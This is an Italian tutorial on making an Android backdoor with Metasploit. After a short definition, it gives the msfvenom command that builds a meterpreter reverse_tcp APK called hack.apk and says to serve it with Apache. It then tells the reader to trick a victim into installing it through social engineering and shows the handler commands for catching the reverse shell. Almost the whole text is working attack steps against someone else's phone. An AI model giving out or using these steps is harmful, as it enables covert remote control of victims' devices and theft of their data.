Che cos’è una Backdoor?
Una BackDoor (letteralmente “porta sul retro”) è un piccolo file, che può essere scritto in vari linguaggi, capace di mettere in connessione due dispositivi bypassando i normali controlli di sicurezza. Il dispositivo attaccante crea una reverse connection trasformandosi in un server e connettendosi al dispositivo vittima (client).
In questa demo utilizzeremo Metasploit per creare una BackDoor da inviare poi al nostro dispositivo vittima (Android) da remoto.
Prerequisiti
- Metasploit preinstallato
- Apache web server preinstallato
- Kali Linux
Prima fase “trasformare” il PC attaccante in un server.
aprire un terminale e attivare il WebServer Apache (se avete Kali Linux Apache è già preinstallato)
service apache2 start
Ora da un nuovo terminale creare la Backdoor .apk:
msfvenom -p android/meterpreter/reverse_tcp LHOST= “Tuo IP pubblico” R > /root/Scrivania/hack.apk
ecco l’output
root@Rugged:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=”Mio IP” R > /root/Scrivania/hack.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8826 bytes
verrà cosi generato un file .apk denominato “hack.apk” sul vostro desktop
ora con un pò di ingegneria sociale far installare il file alla vittima!!
poi aprire Metasploit e mettersi in ascolto:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost= Tuo IP pubblico
lhost= => Tuo IP pubblico
msf exploit(handler) > exploit
Attendere che la vittima installi il file….
